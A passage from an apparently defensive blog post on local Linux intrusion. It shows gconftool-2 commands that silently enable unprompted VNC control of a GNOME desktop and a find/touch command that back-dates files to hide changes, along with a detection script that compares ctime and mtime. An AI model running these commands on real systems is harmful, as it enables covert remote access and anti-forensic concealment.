  gconftool-2 --set /desktop/gnome/remote_access/prompt_enabled --type bool false
  gconftool-2 --set /desktop/gnome/remote_access/view_only --type bool false

If no VNC password is required, anyone who can reach port 5900 now controls the desktop session without the user ever being asked. To counter, check the same keys with gconftool-2 --get and look for a running vino-server.

Timestamps

If you want to find files which have been modified recently, you can use “find” (the path to search comes first):

To find files modified in the last 24 hours:

  find / -mtime -1

Or files whose inode changed in the last 24 hours (ctime covers permission, ownership, link count and rename changes besides writes; there is no creation time to search for):

  find / -ctime -1

If you have a reference file:

  find / -newer /path/to/file

To hide your changes to a file, you can use “find” with “touch” to either simply touch the files to give them the current timestamp, or give them the timestamp of a reference file:

  find /tmp/ -exec touch --reference=/path/to/file '{}' \;

touch can only set atime and mtime, though; the ctime is set by the kernel to the moment you ran touch, so -ctime will still find the files.
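An added example of turning that ctime caveat into a check, not code from the original post: it lists files whose inode changed within the last N days while their mtime claims to be older, which is exactly what touch --reference leaves behind (and, incidentally, what a config file copied aside with cp -p and moved back looks like). It assumes a POSIX find with -ctime and -mtime and stays within one filesystem; the demo directory is constructed in a temporary location.

```shell
#!/bin/sh
# Added example (not from the original post): find files whose mtime was
# pushed back with touch --reference. touch can set atime and mtime, but
# the inode change time (ctime) is always set by the kernel to the
# current time and cannot be set from user space, so a file whose inode
# changed recently while its mtime claims otherwise has been either
# doctored or touched by chmod, chown or a rename (a config file copied
# aside with cp -p and moved back looks exactly like this).
#
# Assumption: a POSIX find with -ctime and -mtime; the search stays on
# one filesystem (-xdev).

# recently_changed_with_old_mtime ROOT DAYS
# Prints regular files under ROOT whose ctime is within the last DAYS
# days but whose mtime is older than that.
recently_changed_with_old_mtime() {
    find "$1" -xdev -type f -ctime "-$2" ! -mtime "-$2" 2>/dev/null
}

# build_demo_dir
# Constructs a temporary directory with one honestly new file and one
# whose mtime was reset to 2001 the way the attack above does it; prints
# the directory path.
build_demo_dir() {
    d=$(mktemp -d "${TMPDIR:-/tmp}/ts-demo.XXXXXX")
    echo 'written just now' > "$d/honest"
    echo 'modified, then back-dated' > "$d/doctored"
    touch -t 200101010000 "$d/doctored"   # mtime 2001, ctime still now
    echo "$d"
}

DEMO=$(build_demo_dir)
echo "files that changed in the last day but claim an older mtime:"
recently_changed_with_old_mtime "$DEMO" 1
rm -rf "$DEMO"

# Live use: recently_changed_with_old_mtime /etc 1, or over / after a
# suspected 15-minute visit. Expect some noise from package installs,
# which keep the archive's mtime, and from chmod/chown; the point is to
# get a short list that is actually worth reading.
```

Run over / after the 900 seconds from the introduction, the list is short enough to read by hand, and every entry on it has a story: either a package was installed, a permission was changed, or somebody ran touch.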
Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.